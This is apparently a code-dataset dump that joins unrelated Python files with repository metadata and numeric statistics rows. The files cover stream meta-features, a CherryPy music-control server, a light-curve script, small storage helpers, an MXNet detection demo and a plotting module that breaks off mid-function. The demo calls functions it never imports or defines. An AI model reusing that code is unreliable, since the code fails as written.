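#     {
#         "rb": {"spec_folder": "spec", "spec_ends_with": "spec"}
#     }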
| 28.224719 | 78 | 0.582006 | 296 | 2,512 | 4.804054 | 0.314189 | 0.054149 | 0.070323 | 0.050633 | 0.078762 | 0.054852 | 0.054852 | 0.054852 | 0 | 0 | 0 | 0.003499 | 0.317277 | 2,512 | 88 | 79 | 28.545455 | 0.825656 | 0.019506 | 0 | 0.090909 | 0 | 0 | 0.080081 | 0.012602 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106061 | false | 0 | 0.075758 | 0.015152 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623beaedf7161b7fcf19fc44bd49f0c9204f1e5b | 5,469 | py | Python | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 4 | 2020-04-29T03:36:36.000Z | 2021-09-01T02:46:19.000Z | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 2 | 2020-05-04T07:46:31.000Z | 2022-03-14T20:28:25.000Z | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 3 | 2020-02-21T00:27:32.000Z | 2020-05-04T07:04:35.000Z | # Imports
import numpy as np
#from skmultiflow.evaluation.base_evaluator import StreamEvaluator
#from skmultiflow import data
#from skmultiflow.metrics import WindowClassificationMeasurements, ClassificationMeasurements, \
# MultiTargetClassificationMeasurements, WindowMultiTargetClassificationMeasurements, RegressionMeasurements, \
# WindowRegressionMeasurements, MultiTargetRegressionMeasurements, \
# WindowMultiTargetRegressionMeasurements, RunningTimeMeasurements
class ComputeStreamMetaFeatures():
"""
Description :
        Computes several meta-features extracted from the stream.
"""
# TODO : Create a file to list features to be extracted (like constants in scikit.multiflow)
def __init__(self,
stream = None,
list_feat = None):
if stream != None :
self.stream = stream
else :
raise ValueError("A stream must be specified")
        # TODO : test here if meta-features in list are correct
if ((list_feat != None) and (isinstance(list_feat, list))):
self.list_feat = list_feat
else :
raise ValueError("A list of features must be specified. Attibute 'list_feat' must be 'list'")
# List of stream samples for redundancy calculation
self.list_stream_samples = []
# List of stream prediction and true labels for severity calculation
self.list_predicted_y = []
self.list_true_y = []
# List of stream instances for magnitude calculation
self.list_instances_after_drift = []
self.list_instances_before_drift = []
# List of predictions for magnitude calculation
self.list_predictions_after_drift = []
self.list_predictions_before_drift = []
def run_extraction(self, list_extrac):
list_model_meta_feats = []
list_drift_meta_feats = []
if 'perc_redund_feat' in self.list_feat and 'perc_redund_feat' in list_extrac :
list_model_meta_feats.append(self.extractPercRedundFeatMeasured())
if 'drift_severity' in self.list_feat and 'drift_severity' in list_extrac :
list_drift_meta_feats.append(self.extractSeverityOneDrift())
if 'drift_magnitude_inst' in self.list_feat and 'drift_magnitude_inst' in list_extrac :
w1 = np.array(self.list_instances_before_drift)
w2 = np.array(self.list_instances_after_drift)
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
if 'drift_magnitude_att' in self.list_feat and 'drift_magnitude_att' in list_extrac :
w1 = np.array(self.list_instances_before_drift).T
w2 = np.array(self.list_instances_after_drift).T
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
if 'drift_magnitude_pred' in self.list_feat and 'drift_magnitude_pred' in list_extrac :
w1 = np.array(self.list_predictions_after_drift)
w2 = np.array(self.list_predictions_before_drift)
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
return list_model_meta_feats, list_drift_meta_feats
################
# Meta-features
################
## Model related
# Extract percentage of redundant features by simple reading of stream attribute
def extractPercRedundFeat(self) :
""" Extraction of the percentage of redundant features, directly read from the stream parameters
"""
return self.stream.perc_redund_features
# Extract percentage of redundant features by measuring correlation between features
def extractPercRedundFeatMeasured(self):
""" Extraction of the percentage of redundant features, measured on the stream by correlation between features
"""
array_samples = np.vstack(self.list_stream_samples)
corr_matrix = np.corrcoef(array_samples,rowvar=False)
n_feat_redund = 0
for i in range(self.stream.n_features) :
for j in range(i-1):
if corr_matrix[i][j] > 0.8 :
n_feat_redund +=1
break
perc_redund_measured = n_feat_redund/self.stream.n_features
# print('Perc redund measured : {}'.format(perc_redund_measured))
return perc_redund_measured
## Drift related
def extractSeverityOneDrift(self):
""" Extraction of the severity of a single drift
"""
n_instances_in_warning = len(self.list_predicted_y)
n_missclass_in_warning = 0
for i in range(n_instances_in_warning) :
if self.list_predicted_y[i] != self.list_true_y[i] :
n_missclass_in_warning += 1
severity = n_missclass_in_warning/n_instances_in_warning
print('Severity measured : {}'.format(severity))
return severity
# def hellinger(p, q):
# return np.sqrt(np.sum((np.sqrt(p) - np.sqrt(q)) ** 2)) / np.sqrt(2)
def extractMagnitudeOneDrift(self,p,q):
""" Extraction of the magnitude of a single drift
Attributes :
p : distribution before drift (array)
q : distribution after drift (array)
"""
P = p/p.sum()
Q = q/q.sum()
# Magnitude = hellinger distance
magnitude = np.sqrt(np.sum((np.sqrt(P) - np.sqrt(Q)) ** 2)) / np.sqrt(2)
print('Magnitude measured : {}'.format(magnitude))
return magnitude
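

# Worked example of the Hellinger-distance magnitude above (illustrative numbers):
# for already-normalised distributions p = [0.5, 0.5] and q = [0.9, 0.1],
# magnitude = sqrt((sqrt(0.5)-sqrt(0.9))**2 + (sqrt(0.5)-sqrt(0.1))**2) / sqrt(2)
#           ~= 0.32,
# where 0 means identical distributions and 1 means disjoint support.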
| 36.218543 | 118 | 0.666118 | 643 | 5,469 | 5.432348 | 0.225505 | 0.054967 | 0.020613 | 0.030919 | 0.329516 | 0.262525 | 0.209276 | 0.182651 | 0.107071 | 0.107071 | 0 | 0.005611 | 0.250503 | 5,469 | 150 | 119 | 36.46 | 0.846548 | 0.309746 | 0 | 0.073529 | 0 | 0 | 0.08873 | 0 | 0 | 0 | 0 | 0.006667 | 0 | 1 | 0.088235 | false | 0 | 0.014706 | 0 | 0.191176 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623d4c734ef05d43ec6efbe7c20cf02af7a7937a | 3,477 | py | Python | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | 4 | 2015-05-26T00:01:57.000Z | 2017-08-07T15:46:31.000Z | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | null | null | null | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
'''
webserver - Brings PD to the web
Copyright (C) 2012 Sean Whalen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from os import listdir
import cherrypy
import pd
class Root(object):
"""
The dynamic web root
"""
@cherrypy.expose()
def set_volume(self, value):
"""
Sets the volume to the given percentage
@param value: the volume percentage
"""
value = int(value)
if value >= 0 and value <= 100:
self._volume = value
self._pd.set_volume(self._volume)
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def set_reverb(self, value):
"""
Sets the reverberation to the given percentage
@param value: the reverberation percentage
"""
value = int(value)
if value >= 0 and value <= 100:
self._reverb = value
self._pd.set_reverb(self._reverb)
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def play(self, value):
"""
Plays the selected track
@param value: the index value from the list of tracks
"""
value = int(value)
if value >= 0 and value <= len(self._tracks) - 1:
self._track = value
self._pd.play(self._tracks[self._track])
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def pause(self):
"""
Pauses or resumes music playback
"""
self._pd.pause()
def __init__(self):
"""
Connects to PD and sets the initial values
"""
self._pd = pd.Client("127.0.0.1", 3000)
self._track = 0
self.set_volume(30)
self.set_reverb(0)
self._tracks = sorted(listdir("music"))
for track in self._tracks:
if track.startswith("."):
self._tracks.remove(track)
@cherrypy.expose()
@cherrypy.tools.json_out()
def get_tracks(self):
"""
Returns a JSON list of tracks
"""
return self._tracks
@cherrypy.expose()
@cherrypy.tools.json_out()
def get_status(self):
"""
Returns JSON pairs containing current values
"""
return {"track": self._track,
"volume": self._volume,
"reverb": self._reverb}
if __name__ == '__main__':
cherrypy.quickstart(Root(), config="webserver.conf")
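
# The exposed methods above map to HTTP endpoints under the web root (illustrative
# URLs; host and port come from webserver.conf):
#
#     /get_tracks           -> JSON list of track file names from the music folder
#     /get_status           -> {"track": ..., "volume": ..., "reverb": ...}
#     /play?value=0         -> play the first track in the sorted list
#     /set_volume?value=50  -> set playback volume to 50%
#     /set_reverb?value=25  -> set reverberation to 25%
#     /pause                -> pause or resume playback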
| 30.234783 | 79 | 0.629853 | 442 | 3,477 | 4.850679 | 0.386878 | 0.041045 | 0.031716 | 0.020989 | 0.198694 | 0.198694 | 0.198694 | 0.16791 | 0.117071 | 0.04291 | 0 | 0.01483 | 0.282427 | 3,477 | 114 | 80 | 30.5 | 0.844489 | 0.438596 | 0 | 0.365385 | 0 | 0 | 0.030963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134615 | false | 0 | 0.057692 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6241b30db0b388e0cf48062ffaf258a9876a9df8 | 705 | py | Python | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | 1 | 2021-09-01T16:50:59.000Z | 2021-09-01T16:50:59.000Z | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | null | null | null | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | 1 | 2021-09-01T16:19:05.000Z | 2021-09-01T16:19:05.000Z | # Written by Devang Patel
# GitHub username: acse-dp1820
import os
def output_file(filename):
"""
Checks if the file exists + creates filepath with any associated directories.
Parameters:
-----------
filename: str
location of output file
"""
# if file exists, print filepath
if os.path.isfile(filename):
print("The output filepath is: " + filename)
# if file doesn't exist, create the filepath even if some directories exist and print filepath
else:
print("Creating file + associated directories.")
os.makedirs(os.path.dirname(filename), exist_ok=True)
print("The output filepath is: " + filename)
| 29.375 | 99 | 0.639716 | 85 | 705 | 5.282353 | 0.529412 | 0.044543 | 0.062361 | 0.097996 | 0.142539 | 0.142539 | 0 | 0 | 0 | 0 | 0 | 0.007737 | 0.266667 | 705 | 23 | 100 | 30.652174 | 0.860735 | 0.456738 | 0 | 0.25 | 0 | 0 | 0.267692 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62425da651aff65da4e4e8d8531685e2a01a3929 | 2,271 | py | Python | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
data = np.genfromtxt('K2-141_detrended_bonly.csv', delimiter=',', skip_header=1, dtype=np.double)
planetb_period = 0.2803234429
sel = (data[:,0] < 0.00000)
TIME = data[:,0]+planetb_period*sel
PHA = TIME/planetb_period
VAL = data[:,2]
sel = (PHA> 0.2) & (PHA<0.8)
K2_error_estimate = np.std(VAL[sel]) #
K2_error_estimate = 0.00002 # Halved and rounded in order to allow for variation of the jitter parameter
#create file with transit of only planet b
TIME = data[:,1] + 4833.00
fileout = open('K2-141_detrended_bonly.dat','w')
for t,f in zip(TIME,VAL):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
data = np.genfromtxt('K2-141_raw_noplanets.dat')
TIME = data[:,0]
RAW = data[:,1]
size_full = np.size(data[:,0])
size_tobereshaped = size_full - size_full % 5
BJD = data[:size_tobereshaped,0]
VAL = data[:size_tobereshaped,1]
BJD_avg = np.mean(BJD.reshape(-1, 5), axis=1)
VAL_avg = np.mean(VAL.reshape(-1, 5), axis=1)
ERR_avg = np.std(VAL.reshape(-1, 5), axis=1)
fileout = open('K2-141_raw_noplanets_5sampled.dat','w')
for t,f,e in zip(BJD_avg,VAL_avg,ERR_avg):
fileout.write('{0:f} {1:f} {2:f} 0 0 -1 \n'.format(t,f,e))
fileout.close()
size_full = np.size(data[:,0])
size_tobereshaped = size_full - size_full % 10
BJD = data[:size_tobereshaped,0]
VAL = data[:size_tobereshaped,1]
BJD_avg = np.mean(BJD.reshape(-1, 10), axis=1)
VAL_avg = np.mean(VAL.reshape(-1, 10), axis=1)
ERR_avg = np.std(VAL.reshape(-1, 10), axis=1)
fileout = open('K2-141_raw_noplanets_10sampled.dat','w')
for t,f,e in zip(BJD_avg,VAL_avg,ERR_avg):
fileout.write('{0:f} {1:f} {2:f} 0 0 -1 \n'.format(t,f,e))
fileout.close()
#create rebinned file
data = np.genfromtxt('K2-141_raw_detrended.csv', delimiter=',', skip_header=1, dtype=np.double)
TIME = data[:,0] + 4833.00000
RAW = data[:,1]
DET = data[:,2]
#create file with raw and normalized curve
fileout = open('K2-141_raw.dat','w')
for t,f in zip(TIME,RAW):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
fileout = open('K2-141_detrended.dat','w')
for t,f in zip(TIME,DET):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
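
# Note on the rebinning above (illustrative arithmetic): the arrays are first
# truncated to a multiple of the bin size, then reshape(-1, n) groups n consecutive
# samples per row, so np.mean(..., axis=1) gives the binned flux and
# np.std(..., axis=1) its scatter. For example, 23 points binned by 5 keep the
# first 20 samples and yield 4 bins.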
| 29.115385 | 104 | 0.681638 | 428 | 2,271 | 3.488318 | 0.205607 | 0.013396 | 0.050234 | 0.053583 | 0.680509 | 0.618218 | 0.58205 | 0.58205 | 0.453449 | 0.379772 | 0 | 0.077078 | 0.125936 | 2,271 | 77 | 105 | 29.493506 | 0.675063 | 0.077499 | 0 | 0.377358 | 0 | 0.09434 | 0.165629 | 0.079943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037736 | 0 | 0.037736 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6245169cc50a2a9fac70a4cfb8aee3852ee809b1 | 515 | py | Python | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | 1 | 2021-12-15T13:34:19.000Z | 2021-12-15T13:34:19.000Z | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | null | null | null | pushy/util/localStorage.py | pushy-me/pushy-python | 6dba2c7533f992949d82ae5b2191da7e856f6b07 | [
"Apache-2.0"
] | 1 | 2021-12-15T06:04:07.000Z | 2021-12-15T06:04:07.000Z | import dbm
from pathlib import Path
# Make sure 'db' subdirectory exists
Path('db').mkdir(exist_ok=True)
# Open and/or create key value store
db = dbm.open('db/pushy', 'c')
# Getter method
def get(key):
try:
return db[key].decode('utf-8')
# Return null if key doesn't exist
except KeyError:
return None
# Setter method
def set(key, value):
db[key] = value
# Delete method
def delete(key):
try:
del db[key]
except KeyError:
# Do nothing if key doesn't exist
return
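
# Example usage (illustrative key/value; module path follows this repository layout):
#
#     from pushy.util import localStorage
#     localStorage.set('deviceToken', 'abc123')
#     localStorage.get('deviceToken')   # -> 'abc123'
#     localStorage.get('missing')       # -> None
#     localStorage.delete('deviceToken')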
| 17.758621 | 38 | 0.654369 | 81 | 515 | 4.148148 | 0.555556 | 0.071429 | 0.059524 | 0.065476 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002538 | 0.234951 | 515 | 28 | 39 | 18.392857 | 0.850254 | 0.341748 | 0 | 0.25 | 0 | 0 | 0.048338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62452dfea77c5218139248e918f29a902f34bc4a | 569 | py | Python | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 4 | 2017-08-03T00:48:51.000Z | 2021-03-03T10:36:52.000Z | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 1 | 2017-08-26T18:28:47.000Z | 2017-08-26T18:28:47.000Z | dex/db/influxdb/__init__.py | synw/django-dex | 67ac968427209e4b74b57cfa98d38a33337b024f | [
"MIT"
] | 1 | 2019-05-09T00:17:58.000Z | 2019-05-09T00:17:58.000Z | from influxdb import InfluxDBClient
CLI = None
POINTS = []
def init(db):
global CLI
CLI = InfluxDBClient(
db.conf["host"],
db.conf["port"],
db.conf["user"],
db.conf["password"],
db.conf["db"],
)
def write(point, force_save=False):
global CLI
global POINTS
POINTS.append(point)
if len(POINTS) < 100 and force_save is False:
return
try:
CLI.write_points(POINTS, batch_size=1000, time_precision="s")
POINTS = []
except Exception as err:
raise err
return
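
# Usage sketch (illustrative): init() must be called once with a db object whose
# conf dict holds the InfluxDB connection settings; write() then buffers points and
# only flushes them in a batch once 100 points have accumulated, or immediately
# when force_save=True, e.g.:
#
#     write({"measurement": "hits", "fields": {"value": 1}}, force_save=True)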
| 18.354839 | 69 | 0.581722 | 71 | 569 | 4.591549 | 0.56338 | 0.092025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017632 | 0.302285 | 569 | 30 | 70 | 18.966667 | 0.803526 | 0 | 0 | 0.25 | 0 | 0 | 0.040422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.041667 | 0.041667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624768d474ea959287b2ba23c3a80b1311919879 | 6,990 | py | Python | multi_demo.py | ChunGaoY/DSPnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 33 | 2018-04-18T06:52:16.000Z | 2021-09-26T20:57:56.000Z | multi_demo.py | ChunGaoY/DSPnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 4 | 2018-07-09T07:09:15.000Z | 2020-04-12T12:43:36.000Z | multi_demo.py | liangfu/dspnet | 8fad61059d85ad0cd1f7790c37b5e0478dccb158 | [
"MIT"
] | 10 | 2018-04-19T08:17:01.000Z | 2021-09-26T20:57:57.000Z | import os
os.environ["MXNET_EXAMPLE_SSD_DISABLE_PRE_INSTALLED"]='1'
import argparse
import tools.find_mxnet
import mxnet as mx
import sys
from detect.multitask_detector import Detector
from symbol.multitask_symbol_factory import get_det_symbol, get_seg_symbol, get_multi_symbol
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, num_class,
nms_thresh=0.5, force_nms=True, nms_topk=400):
"""
wrapper for initialize a detector
Parameters:
----------
net : str
test network name
prefix : str
load model prefix
epoch : int
load model epoch
data_shape : int
resize image shape
mean_pixels : tuple (float, float, float)
mean pixel values (R, G, B)
ctx : mx.ctx
running context, mx.cpu() or mx.gpu(?)
num_class : int
number of classes
nms_thresh : float
non-maximum suppression threshold
force_nms : bool
force suppress different categories
"""
if net is not None:
if net.endswith("fcn32s"):
net = get_fcn32s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
elif net.endswith("fcn16s"):
net = get_fcn16s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
elif net.endswith("fcn8s"):
net = get_fcn8s_symbol(net.split("_")[0], data_shape, num_classes=num_class, nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
############### uncomment the following lines to visualize network ###########################
# dot = mx.viz.plot_network(net, shape={'data':(1,3,512,1024)})
# dot = mx.viz.plot_network(net, shape={'data':(1,3,320,640)})
# dot.view()
detector = Detector(net, prefix, epoch, data_shape, mean_pixels, ctx=ctx)
return detector
def parse_args():
parser = argparse.ArgumentParser(description='Single-shot detection network demo')
parser.add_argument('--network', dest='network', type=str, default='resnet-18_fcn32s',
help='which network to use')
parser.add_argument('--images', dest='images', type=str, default='./data/demo/dog.jpg',
help='run demo with images, use comma to seperate multiple images')
parser.add_argument('--dir', dest='dir', nargs='?',
help='demo image directory, optional', type=str)
parser.add_argument('--ext', dest='extension', help='image extension, optional',
type=str, nargs='?')
parser.add_argument('--epoch', dest='epoch', help='epoch of trained model',
default=0, type=int)
parser.add_argument('--prefix', dest='prefix', help='trained model prefix',
default=os.path.join(os.getcwd(), 'models', 'multitask_'),
type=str)
parser.add_argument('--cpu', dest='cpu', help='(override GPU) use CPU to detect',
action='store_true', default=False)
parser.add_argument('--gpu', dest='gpu_id', type=int, default=0,
help='GPU device id to detect with')
parser.add_argument('--data-shape', dest='data_shape', type=str, default="3,512,1024",
help='set image shape')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--thresh', dest='thresh', type=float, default=0.6,
help='object visualize score threshold, default 0.6')
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.5,
help='non-maximum suppression threshold, default 0.5')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
parser.add_argument('--timer', dest='show_timer', type=bool, default=True,
help='show detection time')
parser.add_argument('--deploy', dest='deploy_net', action='store_true', default=False,
help='Load network from json file, rather than from symbol')
parser.add_argument('--class-names', dest='class_names', type=str,
default='aeroplane, bicycle, bird, boat, bottle, bus, \
car, cat, chair, cow, diningtable, dog, horse, motorbike, \
person, pottedplant, sheep, sofa, train, tvmonitor',
help='string of comma separated names, or text filename')
args = parser.parse_args()
return args
def parse_class_names(class_names):
""" parse # classes and class_names if applicable """
if len(class_names) > 0:
if os.path.isfile(class_names):
# try to open it to read class names
with open(class_names, 'r') as f:
class_names = [l.strip() for l in f.readlines()]
else:
class_names = [c.strip() for c in class_names.split(',')]
for name in class_names:
assert len(name) > 0
else:
raise RuntimeError("No valid class_name provided...")
return class_names
if __name__ == '__main__':
args = parse_args()
if args.cpu:
ctx = mx.cpu()
else:
ctx = mx.gpu(args.gpu_id)
# parse image list
# image_list = [i.strip() for i in args.images.split(',')]
# assert len(image_list) > 0, "No valid image specified to detect"
imgname = args.images
network = None if args.deploy_net else args.network
class_names = parse_class_names(args.class_names)
data_shape = None
if isinstance(args.data_shape, int):
data_shape = 3,args.data_shape,args.data_shape
else:
        data_shape = list(map(int, args.data_shape.split(",")))
assert len(data_shape) == 3 and data_shape[0] == 3
if args.prefix.endswith('_'):
prefix = args.prefix + args.network + '_' + str(data_shape[1])
else:
prefix = args.prefix
# print(network, prefix, args.epoch, data_shape,
# (args.mean_r, args.mean_g, args.mean_b),
# ctx, len(class_names), args.nms_thresh, args.force_nms)
detector = get_detector(network, prefix, args.epoch, data_shape,
(args.mean_r, args.mean_g, args.mean_b),
ctx, len(class_names), args.nms_thresh, args.force_nms)
# run detection
detector.detect_and_visualize(imgname, args.dir, args.extension,
class_names, args.thresh, args.show_timer)
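
# Example invocation (illustrative; model prefix and image path follow the argparse
# defaults above):
#
#     python multi_demo.py --network resnet-18_fcn32s --images ./data/demo/dog.jpg \
#         --prefix ./models/multitask_ --epoch 0 --data-shape 3,512,1024 --gpu 0
#
# Pass --cpu to run inference on the CPU instead of a GPU.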
| 46.291391 | 112 | 0.609156 | 903 | 6,990 | 4.535991 | 0.251384 | 0.043945 | 0.074707 | 0.016602 | 0.227539 | 0.173828 | 0.15918 | 0.15918 | 0.15918 | 0.137695 | 0 | 0.014526 | 0.261373 | 6,990 | 150 | 113 | 46.6 | 0.778811 | 0.151216 | 0 | 0.078431 | 0 | 0 | 0.180135 | 0.006749 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.029412 | false | 0 | 0.068627 | 0 | 0.127451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62485e5d3f7ade14edb4bfc1d0fe39849cda19e0 | 2,551 | py | Python | viz.py | all-umass/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | 3 | 2017-01-15T15:46:21.000Z | 2021-01-02T08:51:48.000Z | viz.py | perimosocordiae/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | null | null | null | viz.py | perimosocordiae/manifold_spanning_graphs | 236efd18eb673ed20bf585fc5de6e6aa080eed79 | [
"MIT"
] | 4 | 2015-09-18T14:28:20.000Z | 2018-09-29T21:53:32.000Z | import numpy as np
from matplotlib import pyplot
def scatterplot(X, marker='.', title=None, fig=None, ax=None, **kwargs):
'''General plotting function for a set of points X. May be [1-3] dimensional.'''
assert len(X.shape) in (1,2), 'Only valid for 1 or 2-d arrays of points'
assert len(X.shape) == 1 or X.shape[1] in (1,2,3), 'Only valid for [1-3] dimensional points'
is_3d = len(X.shape) == 2 and X.shape[1] == 3
is_1d = len(X.shape) == 1 or X.shape[1] == 1
if ax is None:
if fig is None:
fig = pyplot.gcf()
if is_3d:
from mpl_toolkits.mplot3d import Axes3D
ax = Axes3D(fig)
else:
ax = fig.add_subplot(111)
elif is_3d:
assert hasattr(ax, 'zaxis'), 'Must provide an Axes3D axis'
# Do the plotting
if is_1d:
ax.scatter(X, marker=marker, **kwargs)
elif is_3d:
ax.scatter(X[:,0], X[:,1], X[:,2], marker=marker, **kwargs)
else:
ax.scatter(X[:,0], X[:,1], marker=marker, **kwargs)
if title:
ax.set_title(title)
return pyplot.show
def show_neighbor_graph(X, W, title=None, fig=None, ax=None,
edge_style='r-', vertex_style='o', vertex_colors='b',
vertex_sizes=20, vertex_edgecolor='none'):
'''Plot the neighbor connections between points in a data set.'''
assert X.shape[1] in (2,3), 'can only show neighbor graph for 2d or 3d data'
